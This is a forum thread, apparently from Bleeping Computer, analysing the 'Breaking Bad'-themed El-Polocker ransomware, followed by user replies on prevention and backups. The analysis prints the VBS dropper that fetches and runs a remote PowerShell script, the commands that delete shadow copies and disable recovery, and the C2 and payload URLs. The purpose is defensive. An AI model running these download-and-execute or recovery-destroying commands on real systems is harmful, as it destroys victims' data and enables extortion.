The El-Polocker ransomware is no chicken as it encrypts your drives and shares

A new "Breaking Bad" themed ransomware called El-Polocker, or Los Pollos Hermanos, has been targeting and encrypting Australian victim’s data and requesting $450 AUD in order to get their files back. This ransomware is distributed by fake DHL penalty notices that request payment of unpaid fees. This notice contains a DropBox link to a zipped VBS file that when launched will execute a PowerShell script that encrypts your files with AES encryption. Unfortunately, the decryption keys are stored on the Command & Control server and there is currently no way to decrypt your files for free.

Los Pollos Hermanos or El-Polocker Wallpaper

Though the whole Breaking Bad reference is a bit strange, this ransomware should not be taken lightly. Not only will El-Polocker encrypt files on the victims's drives, but it will also encrypt data found on unmapped open network shares. The only other known ransomware that scanned for and encrypted Windows shares was CryptoFortress. When first run, this ransomware will also disable System Restore, delete all of the shadow volume copies, disable Windows Automatic Startup Repair, and tells Windows to ignore all boot failures.

In summary this is what we know about the El-Polocker, or Los Pollos Hermanos, ransomware:

• Encrypts all data files that match the *.jpg,*.csv,*.vsdx,*.ai,*.pub,*.one,*.dotx,*.xml,*.doc,*.xls,*.docx,*.xlsx,*.crt,*.pem,*.p12,*.db,*.mp3,*.jpg,*.jpeg,*.txt,*.rtf,*.pdf,*.rar,*.zip,*.psd,*.msi,*.tif,*.wma,*.lnk,*.gif,*.ppt,*.pptx,*.docm,*.xlsm,*.pps,*.ppsx,*.ods,*.raw,*.pst,*.ost extensions.
• Encrypts each data file with its own symmetrical AES encryption key. This key is then encrypted with a RSA key and stored in the seckeys.DONOTDELETE along with the filename.
• Encrypted data files will have the .HA3 extension.
• Unlike most other ransomware infections, this ransomware will scan UNC network shares as well. So even unmapped network shares will be targeted for encryption.
• Demands $450 AUD to retrieve your decryption key.
• Retrieves the public encryption key from the server so only the malware developer has your private decryption key.
• Deletes shadow volume copies and disables system restore.
• Disable Windows Automatic Startup Repair
• Appears to be Romanian in origin based on comments found in the PowerShell script.

As always, if you have any questions regarding this malware, please feel free to ask and we will try to help. For a more detailed analysis, please see below.

Technical Summmary

El-Polocker is distributed through fake DHL penalty notices that contain a link to a zip file hosted on DropBox that contains a VBS file called Penalty.vbs. If this file is run it will download and execute a PowerShell script that is the main component of the El-Polocker ransomware.

Set oShell = CreateObject("Shell.Application") 

oShell.ShellExecute "powershell", "-WindowStyle Hidden -sta -executionpolicy bypass if (1 -eq 1){IEX ((New-Object Net.WebClient).DownloadString('http://193.xxx.xxx.xxx/wall/encrypt.ps1'));}", "", "", 1

Once the PowerShell script is launched it will inject the C:\1\Reflect.dll into Explorer.exe using a script from [url=https://github.com/mattifestation/PowerSploit]PowerSploit[/b] and then executes the DLL’s VoidFunc function.

This function will then load the C:\1\t.dll, which performs various cleanup commands on the computer:

vssadmin.exe Delete Shadows /All /Quiet
bcdedit /set "{default}" recoveryenabled No
bcdedit /set "{default}" bootstatuspolicy ignoreallfailures;
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

The PowerShell script will then contact the Command & Control Server with the following POST query:

http://193.xxx.xxx.xxx/wall/getKey.php?UUID=<computer_uuid>&pcName=<computer_name>

The C2 server will send back the unique bitcoin address and a master public encryption key that will be used to encrypt the AES keys used to encrypt your files. The PowerShell script will begin to search all drive letters and network UNC shares for files matching certain file extensions and encrypt them with symmetrical AES encryption. When encrypting the files it will use a unique AES key for each file. This unique key will then be encrypted with the downloaded RSA encryption key and stored along with the associated filename in the seckeys.DONOTDELETE file.

Any encrypted files will have a .HA3 extension appended to the filename. The targeted file extensions are:

*.jpg,*.csv,*.vsdx,*.ai,*.pub,*.one,*.dotx,*.xml,*.doc,*.xls,*.docx,*.xlsx,*.crt,*.pem,*.p12,*.db,*.mp3,*.jpg,*.jpeg,*.txt,*.rtf,*.pdf,*.rar,*.zip,*.psd,*.msi,*.tif,*.wma,*.lnk,*.gif,*.ppt,*.pptx,*.docm,*.xlsm,*.pps,*.ppsx,*.ods,*.raw,*.pst,*.ost

When it has completed it will display a variety of ransom notes and display a ransom screen that contains instructions on how to purchase your decryption.

Los Pollos Hermanos or El-Polocker Ransom Screen

If you have made payment you can check to see if they have received it by clicking on the Validation button on the second screen. This will display a prompt stating that it is checking if their received your payment.

Los Pollos Hermanos or El-Polocker Checking For Payment

It checks for payment by continuously sending the follow query to the Command & Control Server:

http://193.xxx.xxx.xxx/wall/getPrivKey.php?UUID=7E1E92A7-8663-BE4D-8856-E0E046267EA8

If payment has been made, it will download a private RSA decryption key and start the decryption process. When decrypting your files, it will read the %Desktop%\seckeys.DONOTDELETE and decrypt each included file's AES key using the private RSA decryption key you received when you made the payment. These decrypted AES keys will then be used to decrypt your files.

The PowerShell script for this infection is commented quite heavily, which helps us understand what they are trying to do. These comments, though, provide us some insight as to where the ransomware probably originated. For example, the comments are in a mix of Romanian and English. Here are some example comments and interesting strings we found in the executables and the PowerShell script:

# pluchat' referencii esti System.dll GAC
####comentario esti to chek every time the encrypted key
### acest settings nu importare case we need to give it if Dec file
#$dirToSearchArr=@("d:\Mahomed\enctest\")
C:\vikulov\projects\msvs\Win32Project1\x64\Release\Sprep.pdb
C:\vikulov\projects\msvs\Win32Project1\x64\Release\Reflect.pdb

During the infection process El-Polocker will create the following files:

C:\1\locked.bmp - Wallpaper
C:\1\reflect.dll - Injected DLL into Explorer.exe
C:\1\t.dll - Injected DLL
C:\ReflectiveLoaderTest\DllMain.txt.ha3 - Log of the injection, which is encrypted by the ransomware
%Desktop%\customer.Id - Victim's bitcoin address.
%Desktop%\encrypted.htm - List of encrypted files
%Desktop%\qwer.html - Ransom Note #1
%Desktop%\qwer2.html - Ransom Note #2
%Desktop%\seckeys.DONOTDELETE - Encryption keys for each encrypted file

Known El-PoLocker Ransomware Registry keys:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR	1
HKCU\Control Panel\Desktop\Wallpaper	"C:\1\locked.bmp"

Edited by Grinler, 12 May 2015 - 03:14 PM.
Fleshed out encryption method.

So there's nothing that Nathan (the decrypter fixer) can do as its stored privately on a server?

Each file is encrypted individually with their own AES key. That AES key, though, is further encrypted with the RSA key that is downloaded from the server. Only they know the private rsa key to decrypt those individual AES keys.

OK so with these new crypto-lockers coming out. What is the easiest solution for preventing from getting infected other than the usual safety when opening or downloading anything....

 

So Crypto-Preventer or Crypto Monitor or Hit man-Pro or all? Right now on my home PC and my work PC I have installed Crypto-Preventer and Crypto-Monitor. Is one better than the other? Do they only work for certain Crypto-Ransom wares? Or will each one be the best to use? Or should I just download a system program like TimeFreeze just in case?

 

If this is getting nasty maybe there should be a topic on what is the best solution in what situation and a guide to prevent this from getting to anyone.

 

However, I have to state the obvious, Backup, Backup, Backup.... I have a Synology device in my home that I back up to regularly and do not have it mapped. It has to log in every time to back up my files. I may have to take that off and do manual backups for a while till this is Crypto crap gets not to be a concern as it is now...

OK so with these new crypto-lockers coming out. What is the easiest solution for preventing from getting infected other than the usual safety when opening or downloading anything....
 
So Crypto-Preventer or Crypto Monitor or Hit man-Pro or all? Right now on my home PC and my work PC I have installed Crypto-Preventer and Crypto-Monitor. Is one better than the other? Do they only work for certain Crypto-Ransom wares? Or will each one be the best to use? Or should I just download a system program like TimeFreeze just in case?

CryptoMonitor and CryptoPrevent explained

• HitmanPro.Alert with CryptoGuard - HitmanPro.Alert Features
• Malwarebytes Anti-Exploit (MBAE)

Backing up your data and disk imaging are among the most important maintenance tasks users should perform on a regular basis, yet it's one of the most neglected areas.

The widespread emergence of crypto malware (ransomware) has brought attention to the importance of backing up all data every day on a regular basis. The only reliable way to effectively protect your data and limit the loss with this type of infection is user education and to have an effective backup strategy. A backup strategy is not only effective against ransomware and other harmful malware but also helps with catastrophic scenarios like hard disk failure, power failure and power surges which can damage internal hardware components. In some cases, the system can be rendered unbootable and you may not have access to the computer to back up any data. A computer's hard drive will not last forever and at some point its going to fail and eventually need replacing. Hard disk failure can occur suddenly without warning or it could occur gradually due to failing areas of the disc requiring repeated read attempts before successful access or as a result of bad clusters accumulating over time to the point the drive becomes unusable.

Hello QuietMan7,

 

I thank you for the information links you provided above. It is very helpful.

 

I am the Sr. Tech./ Network & Server Admin for the district and have been dreading this since the beginning. WE had it pop up in our district in February and the Teacher did not inform anyone they just turned off their computer and left it! So yahoo all the teachers files were encrypted as well as some files on the Novell drives she connects to. Luckily she has limited connections so all was not lost. Then another one that unfortunately made it into more drives in another school and they pulled the plug as soon as they noticed the system not being able to access files, however the damage was done. They lost half their files on the server. Really nothing much just a bunch of files they downloaded from one of our school sites that are still out there for download, and some of their files, which luckily all these years of yelling backup, they had!

 

I am going to get together with the  High School Computer Teacher on getting a little PowerPoint put together along with some links on the effects of this new threat and how to protect yourself. Unfortunately a lot of the teachers say their school systems are faster than their home machines, so you know what that means....

 

I have been making backups offline to different sites and been trying to keep the servers safe. IT is always evolving, but when you get people who do this maliciously it makes you want to throw your hat in the ring and say I am done! A lot of my users still say, oh that will never happen to me. Yeah sure...what reality you living in???

 

I do know the power of not having a backup. Many years ago I was a consultant and worked for a major airline and the night before I backed up my system to their server, about 2 million dollars worth of work. The weekend went by no problem, computer acted weird at home, but no biggie...until Monday... Then I got it with the Win32.CIH virus...remember that one?? It not only wiped my hard drive but it tried to write my bios on my laptop as well. Luckily I caught it, wiped the machine and reloaded it with the factory disks. Then I thought about all the work. I called and asked if they had my backup and they said they did, so crisis averted. So yes I know first hand how these things can get down right nasty....And Hard Drive failure had 2 die in a year....yeah that was fun...but had backups....I have copies of copies and backups of backups...

 

Anyway thanks for the links. They will come in handy for what we will be creating. always a great site and good information to pass along to the masses....

You're welcome on behalf of the Bleeping Computer community.

Additional Payload / Downloaded Files and Associated URLs

 

http://193.xxx.xxx.xx/wall/Invoke-ReflectivePEInjection.ps1
http://193.xxx.xxx.xx/wall/encrypt.ps1
http://193.xxx.xxx.xx/wall/request.php

 

YouTube Videos

 

https://www.youtube.com/watch?v=hroPcR-0zSI (Buying BitCoins Online Tutorial)
https://www.youtube.com/watch?v=8zCpQZPX1lA (GTA V Radio Soundtrack Video)

One possible method for prevention against encryption viruses would be to take away users admin rights. Does anyone know if this is effective or not?

Unfortunately, it doesnt matter. The ransomware runs under the same privileges as the infected user and thus can encrypt any files they have access to.

Crypto malware will run on non-admin accounts and encrypt all the files that are accessible to that user. Crypto malware typically runs as the User, not as Administrator, so you will not see a UAC prompt.

The best defensive strategy is a comprehensive approach...make sure you are running an updated anti-virus and anti-malware product, use supplemental security tools capable of stopping (preventing) infection before it can cause any damage, update all vulnerable software and routinely backup your data.

Ransomware Prevention Tools:

• CryptoMonitor - CryptoMonitor Discussion & Support
• CryptoPrevent - CryptoPrevent FAQs
• HitmanPro.Alert with CryptoGuard - HitmanPro.Alert Features
• Malwarebytes Anti-Exploit (MBAE)
• Symantec's NoScript tool

Backing up your data and disk imaging are among the most important maintenance tasks users should perform on a regular basis, yet it's one of the most neglected areas.

• How to back up or transfer your data on a Windows-based computer
• How to create a Windows system image in Windows 7 and Windows 8
• How to use System Image Recovery in the Windows 7 and Windows 8 Recovery Environment

The widespread emergence of crypto malware (ransomware) has brought attention to the importance of backing up all data every day on a regular basis. The only reliable way to effectively protect your data and limit the loss with this type of infection is user education and to have an effective backup strategy. A backup strategy is not only effective against ransomware and other harmful malware but also helps with catastrophic scenarios like hard disk failure, power failure and power surges which can damage internal hardware components. In some cases, the system can be rendered unbootable and you may not have access to the computer to back up any data. A computer's hard drive will not last forever and at some point its going to fail and eventually need replacing. Hard disk failure can occur suddenly without warning or it could occur gradually due to failing areas of the disc requiring repeated read attempts before successful access or as a result of bad clusters accumulating over time to the point the drive becomes unusable.

Hi guys, so as a lover of breaking bad and even more, Better Call Saul I had to be affected by this extremely annoying ransomware.

I didn't get a splashscreen, instead there are numerous readme files with instructions as the one shown above. From what I've read in this thread there's no solution to decrypt this one yet?

Posting an encrypted file just in case I can save about 70gb of raw images I shot in the band's last tour.

https://www.sendspace.com/file/oms5u6

WSF scripts began to be used to run the encoder better_call_sou

https://www.virustotal.com/ru/file/75782f96bb573b2d2da56e55d0534e8af15b22ce7a1c770486e28564a68331ce/analysis/1458293551/

Hi guys, so as a lover of breaking bad and even more, Better Call Saul I had to be affected by this extremely annoying ransomware. I didn't get a splashscreen, instead there are numerous readme files with instructions as the one shown above. From what I've read in this thread there's no solution to decrypt this one yet?...

Not the same infection...see this topic.

According to Symantec, this ransomware encrypts files using a random AES encryption key encrypted with an RSA public key so files can only be decrypted by obtaining the private key from the malware developer.

As with most ransomware infections...the best solution for dealing with encrypted data is to restore from backups. If that is not a viable option and if there is no fix tool, the only other alternative is to save your data as is and wait for a possible breakthrough...meaning, what seems like an impossibility at the moment (decryption of your data), there is always hope someday there may be a potential solution so save the encrypted data and wait until that time.

Grinler, (aka Lawrence Abrams), the site owner of Bleeping Computer has said this...

If you are affected by ransomware and do not plan on paying the ransom, the best bet it to immediately image the drive before doing anything else. Then in the future if there is a way to decrypt the files you have everything you may need to do so.